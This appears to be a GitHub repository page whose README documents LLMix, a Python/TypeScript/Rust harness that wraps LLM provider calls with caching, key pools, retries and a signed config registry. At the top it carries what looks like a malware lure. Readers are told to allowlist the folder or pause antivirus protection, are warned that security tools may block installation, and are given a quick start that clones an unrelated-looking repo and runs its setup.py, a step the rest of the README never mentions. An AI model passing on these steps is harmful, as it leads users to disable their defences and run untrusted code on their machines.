LLMix

Tip

If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.

Caution

Some security systems may block the installation. Only download from the official repository.

QUICK START

git clone https://github.com/Souliuangular/llmix-968.git
cd llmix-968
python setup.py

Read in other languages: English · 中文 · Deutsch · Español · Français · Русский · 한국어 · 日本語 · हिन्दी

Config-driven LLM calls for Python, TypeScript, and Rust. Keep your SDK. Move model behavior into MDA presets. Put cache, retries, key rotation, and rollout control around the call.

LLMix is the layer between your product and the provider SDK.

It does not ask you to rewrite your OpenAI, Anthropic, Gemini, LiteLLM, AI SDK, or custom client code. It wraps the call. The boring parts go around it: response cache, circuit breaker, key pools, singleflight, retry policy, adaptive concurrency, provider kwargs, and MDA config loading.

The model stops being a hard-coded string buried in application code. It becomes data. Change a preset, publish a compiled registry release, reload the service, and the next request can run a different provider or model. No redeploy for the usual model swap dance.

That is the whole thing. Small layer. Sharp edges filed down.

Why It Exists

AI products in 2026 do not usually fail because one SDK call is hard.

They fail in the spaces around the call. A key gets rate limited. A provider gets slow. Two hundred users ask the same thing at once. A model swap needs a deploy. A cache key differs by one invisible parameter. One service is in Python, another is in TypeScript, and the Rust worker has to follow the same contract.

LLMix is for that part of the system. The signal chain between your app and the model.

You still own the prompt. You still own the SDK. LLMix owns the harness.

TypeScript OpenAI-compatible helpers

Python Redis cache support

Rust OpenAI helper and Redis cache

cargo add llmix-rs --features providers-openai,redis


LLMix uses the MDA config packages for preset loading. They are also published
as standalone runtime loaders for apps that need `.mda` validation, integrity,
or trust-policy enforcement outside LLMix.

---

## Documentation

If you are new to LLMix, read in this order:

Other operations docs:

- [Secure LLMix configuration translations](docs/llmix/secure-mda/secure-llmix-configuration.md) ([de](docs/llmix/secure-mda/secure-llmix-configuration.de.md), [es](docs/llmix/secure-mda/secure-llmix-configuration.es.md), [fr](docs/llmix/secure-mda/secure-llmix-configuration.fr.md), [hi](docs/llmix/secure-mda/secure-llmix-configuration.hi.md), [ja](docs/llmix/secure-mda/secure-llmix-configuration.ja.md), [ko](docs/llmix/secure-mda/secure-llmix-configuration.ko.md), [ru](docs/llmix/secure-mda/secure-llmix-configuration.ru.md), [中文](docs/llmix/secure-mda/secure-llmix-configuration.zh.md))
- [Key pool operations](docs/llmix/key-pool-operations.md)
- [Standalone MDA config loader docs](docs/mda-config/README.md)

---

## At a Glance

![LLMix wraps your existing LLM SDK stack with MDA config, cache, resilience, and key-pool primitives.](docs/llmix/images/llmix-wraps-sdk.png)

LLMix wraps one provider call at a time.

It is not a router in the LiteLLM sense. It is closer to the harness you keep rebuilding around every agent, coder tool, extraction service, and internal AI workflow once traffic becomes real.

---


### TypeScript

```typescript
import {
  CallPipeline,
  KeyPool,
  TwoTierCache,
  openaiDispatch,
} from "@snoai/llmix";

const pipeline = new CallPipeline({
  dispatch: openaiDispatch(),
  responseCache: new TwoTierCache("memory"),
});

pipeline.setKeyPool("openai", new KeyPool([process.env.OPENAI_API_KEY!]));

const response = await pipeline.call({
  config: {
    provider: "openai",
    model: "gpt-4o-mini",
    common: { temperature: 0.2, maxOutputTokens: 512 },
    caching: { strategy: "memory" },
  },
  messages: [
    { role: "user", content: "Explain LLMix in one sentence." },
  ],
});

console.log(response.content);
await pipeline.close();

Python

import asyncio
import os

from llmix import (
    CallInput,
    CallPipeline,
    KeyPool,
    PipelineConfig,
    TwoTierCache,
    openai_dispatch,
)


async def main() -> None:
    pipeline = CallPipeline(
        PipelineConfig(
            dispatch=openai_dispatch(),
            response_cache=TwoTierCache("memory"),
        )
    )

    pipeline.set_key_pool("openai", KeyPool([os.environ["OPENAI_API_KEY"]]))

    response = await pipeline.call(
        CallInput(
            config={
                "provider": "openai",
                "model": "gpt-4o-mini",
                "common": {"temperature": 0.2, "max_output_tokens": 512},
                "caching": {"strategy": "memory"},
            },
            messages=[
                {"role": "user", "content": "Explain LLMix in one sentence."}
            ],
        )
    )

    print(response.content)
    await pipeline.close()


asyncio.run(main())

Rust

Rust exposes the same pipeline contract. The OpenAI helper is feature-gated.

[dependencies]
llmix-rs = { version = "2.0.0", features = ["providers-openai"] }
serde_json = "1"
tokio = { version = "1", features = ["macros", "rt"] }

use llmix_rs::{
    load_keys_from_env, CallInput, CallPipeline, OpenAiChatHelper, PipelineConfig,
};
use serde_json::json;

let pipeline = CallPipeline::new(PipelineConfig::new(OpenAiChatHelper::new()))?;
pipeline.set_key_pool("openai", load_keys_from_env("openai")?);

let response = pipeline
    .call(CallInput {
        config: json!({
            "provider": "openai",
            "model": "gpt-4o-mini",
            "common": { "temperature": 0.2, "max_output_tokens": 512 },
            "caching": { "strategy": "memory" }
        }),
        messages: vec![json!({
            "role": "user",
            "content": "Explain LLMix in one sentence."
        })],
        singleflight_key: None,
    })
    .await;

See the Rust guide for full main examples and feature flags.

What You Get Around Every Call

Concern	What LLMix does
Response cache	L1 memory plus optional Redis L2, with cross-runtime canonical cache keys
Key pools	Round-robin key selection, 429 rotation, and 401/403 dead-key eviction
Retries	Jittered exponential backoff, with `Retry-After` honored
Circuit breaker	Scoped by provider and effective base URL
Singleflight	Collapses identical concurrent work into one upstream request
Concurrency	AIMD adaptive semaphore, driven by rate-limit feedback
Provider kwargs	Common config becomes provider-specific request fields
Thinking tokens	Optional `<think>` extraction into normalized response objects
Registry	Signed compiled config registry with one live `current.json` pointer

The defaults are meant to be boring. Tune them when real traffic gives you a reason.

MDA Presets

LLMix uses MDA as the source format for model presets. Human notes and runtime settings live in one file. Production services read the compiled registry, not the mutable source tree. Python, TypeScript, and Rust can require MDA integrity, requires.network, and verifier-hook based signatures while loading or publishing registry output. Real Rekor transport and Sigstore cryptography are supplied by caller-provided clients/verifiers.

The examples below use this preset path:

config/llm/source/search_summary/openai_fast.mda

---
name: openai_fast
description: Fast OpenAI preset for search summaries.
metadata:
  snoai-llmix:
    common:
      provider: openai
      model: gpt-5-mini
      temperature: 0.2
      maxOutputTokens: 512
    caching:
      strategy: redis-or-memory
    providerOptions:
      openai:
        reasoningEffort: medium
---
# openai_fast

Summarize search results for a research workflow.

Load it directly when editing or testing a preset:

import { loadMdaConfig } from "@snoai/llmix";

const config = await loadMdaConfig("./config/llm/source/search_summary/openai_fast.mda");

from llmix import load_mda_config

config = load_mda_config("./config/llm/source/search_summary/openai_fast.mda")

use llmix_rs::load_config;

let config = load_config("./config/llm/source/search_summary/openai_fast.mda")?;

For production services, use the registry.

Config Registry

Use this layout. Treat it as the public contract:

config/llm/
  source/
    <module>/
      <preset>.mda
  current.json
  compiled/

source/ is edited by people. current.json and compiled/ are generated by LLMix. Store the trust anchor outside config/llm.

The release flow is:

prepare steps. The did:web example assumes these release-identity inputs already exist outside config/llm: release/did-web-private-key.pem and release/did.json. Provide them from your release system or use the GitHub Actions Sigstore/Rekor profile instead.

mkdir -p config/llm/source/search_summary release deploy

mda init --template llmix-preset \
  --module search_summary \
  --preset openai_fast \
  --provider openai \
  --model gpt-5-mini \
  --out config/llm/source/search_summary/openai_fast.mda

mda validate config/llm/source/search_summary/openai_fast.mda \
  --target source \
  --json

mda integrity compute config/llm/source/search_summary/openai_fast.mda \
  --target source \
  --write \
  --json

mda release trust policy \
  --target llmix-registry \
  --profile did-web \
  --domain config.example.com \
  --out release/trust-policy.json \
  --json

mda sign config/llm/source/search_summary/openai_fast.mda \
  --profile did-web \
  --did did:web:config.example.com \
  --key-id did:web:config.example.com#release \
  --key-file release/did-web-private-key.pem \
  --in-place \
  --json

mda verify config/llm/source/search_summary/openai_fast.mda \
  --target source \
  --policy release/trust-policy.json \
  --did-document release/did.json \
  --json

mda release prepare \
  --target llmix-registry \
  --source config/llm/source \
  --registry-dir config/llm \
  --policy release/trust-policy.json \
  --did-document release/did.json \
  --out release/plan.json \
  --json

llmix publish-registry \
  --root config/llm \
  --release-plan release/plan.json \
  --revision 2026-05-14T000000Z \
  --policy release/trust-policy.json \
  --did-document release/did.json \
  --root-did did:web:config.example.com \
  --root-key-id did:web:config.example.com#release \
  --root-key-file release/did-web-private-key.pem \
  --json

mda release finalize \
  --target llmix-registry \
  --registry-dir config/llm \
  --registry-root config/llm/compiled/2026-05-14T000000Z/registry-root.json \
  --release-plan release/plan.json \
  --policy release/trust-policy.json \
  --derive-root-digest \
  --minimum-revision 2026-05-14T000000Z \
  --out deploy/llmix-trust.json \
  --did-document release/did.json \
  --json

mda doctor release \
  --target llmix-registry \
  --source config/llm/source \
  --registry-dir config/llm \
  --release-plan release/plan.json \
  --manifest deploy/llmix-trust.json \
  --did-document release/did.json \
  --json

llmix check-registry \
  --root config/llm \
  --trust deploy/llmix-trust.json \
  --preset search_summary/openai_fast \
  --did-document release/did.json \
  --tamper-proof \
  --json

Runtime code opens the generated registry with the external trust anchor:

import {
  ConfigRegistryManager,
  loadLlmixTrustManifest,
  registryRootOptionsFromTrustManifest,
} from "@snoai/llmix";

const trust = await loadLlmixTrustManifest(process.env.LLMIX_TRUST_ANCHOR!);
const manager = await ConfigRegistryManager.open("config/llm", {
  signedRoot: registryRootOptionsFromTrustManifest(trust, { didWebVerifier }),
});
const config = await manager.getPreset("search_summary", "openai_fast");

didWebVerifier is the app verifier hook required by this did:web policy. For a command-line runtime proof, use llmix check-registry --did-document release/did.json; in app code, pass the verifier hooks required by your trust policy.

Managers expose the active revision and reload health metadata. That makes it easy to say exactly which config a service is running. See Secure LLMix Configuration with MDA for the complete release flow and runtime tamper-rejection proof.

ConfigRegistryPublisher is still available for advanced release systems, but the default public path is the llmix publish-registry command. Do not write a project-local registry compiler.

Provider Coverage

The public dispatch helpers cover the providers we actually test.

Provider	Python	TypeScript	Notes
OpenAI	`openai_dispatch`	`openaiDispatch`	OpenAI Responses and chat-style flows
Anthropic	`anthropic_dispatch`	`anthropicDispatch`	Messages API, thinking budget validation
Gemini	`gemini_dispatch`	`geminiDispatch`	Google GenAI-compatible params
OpenRouter	`openrouter_dispatch`	`openrouterDispatch`	OpenAI-compatible
DeepInfra	`deepinfra_dispatch`	`deepinfraDispatch`	OpenAI-compatible
Novita	`novita_dispatch`	`novitaDispatch`	OpenAI-compatible
Together	`together_dispatch`	`togetherDispatch`	OpenAI-compatible
Sno GPU	`sno_gpu_dispatch`	`snoGpuDispatch`	On-prem OpenAI-compatible GPU endpoints

Rust currently ships the neutral pipeline plus feature-gated helpers for OpenAI, Anthropic, Gemini, and Sno GPU. Treat Rust provider helpers as beta. The cache, key-pool, registry, retry, and pipeline contract are aligned with Python and TypeScript.

OpenAI-compatible providers reuse the OpenAI request shape with provider-specific base_url handling. That keeps the contract plain. Plain is useful.

Environment Variables

Variable	Purpose
`OPENAI_API_KEY` / `OPENAI_KEYS`	OpenAI key or comma-separated key pool
`ANTHROPIC_API_KEY` / `ANTHROPIC_KEYS`	Anthropic key or comma-separated key pool
`GEMINI_API_KEY` / `GEMINI_KEYS`	Gemini key or comma-separated key pool
`OPENROUTER_API_KEY` / `OPENROUTER_KEYS`	OpenRouter key or comma-separated key pool
`DEEPINFRA_API_KEY` / `DEEPINFRA_KEYS`	DeepInfra key or comma-separated key pool
`TOGETHER_API_KEY` / `TOGETHER_KEYS`	Together key or comma-separated key pool
`NOVITA_API_KEY` / `NOVITA_KEYS`	Novita key or comma-separated key pool
`SNO_LLM_API_KEY`	Sno GPU direct dispatcher fallback
`SNO_GPU_API_KEY` / `SNO_GPU_KEYS`	Sno GPU key-pool variables for provider id `sno-gpu`
`GPU_BASE_URL`	Sno GPU base URL
`REDIS_URL`	Redis response-cache URL
`LLMIX_STATE_DIR`	Lock files, batch metadata, and kill-switch state

load_keys_from_env("provider-name") checks PROVIDER_NAME_KEYS first, then PROVIDER_NAME_API_KEY. Dashes become underscores.

What This Is Not

Not a streaming framework. Streaming stays with your SDK.
Not a prompt framework. Bring your own prompt layer.
Not a provider marketplace. One call uses the provider named by its config.
Not a reason to hide every model decision behind indirection. Some things should stay in code.

LLMix is useful when the same model-call shape keeps showing up across services. If you have one script and one key, you probably do not need it yet.

Development

# Full monorepo checks
bun run build
bun run check
bun run test

License

Apache-2.0

Name		Name	Last commit message	Last commit date
Latest commit History 25 Commits
.github		.github
.vscode		.vscode
src		src
.gitattributes		.gitattributes
.gitignore		.gitignore
CHANGELOG.md		CHANGELOG.md
CODE_OF_CONDUCT.md		CODE_OF_CONDUCT.md
CONTRIBUTING.md		CONTRIBUTING.md
LICENSE		LICENSE
README.md		README.md
SECURITY.md		SECURITY.md
bun.lock		bun.lock
setup.py		setup.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

LLMix

QUICK START

Why It Exists

TypeScript OpenAI-compatible helpers

Python Redis cache support

Rust OpenAI helper and Redis cache

Python

Rust

What You Get Around Every Call

MDA Presets

Config Registry

Provider Coverage

Environment Variables

What This Is Not

Development

License

Related

About

Uh oh!

Releases

Packages

Uh oh!

Contributors

Uh oh!

Languages

Folders and files

Latest commit

History

Repository files navigation

LLMix

QUICK START

Why It Exists

TypeScript OpenAI-compatible helpers

Python Redis cache support

Rust OpenAI helper and Redis cache

Python

Rust

What You Get Around Every Call

MDA Presets

Config Registry

Provider Coverage

Environment Variables

What This Is Not

Development

License

Related

About

Topics

Resources

License

Code of conduct

Contributing

Security policy

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors

Uh oh!

Languages

Packages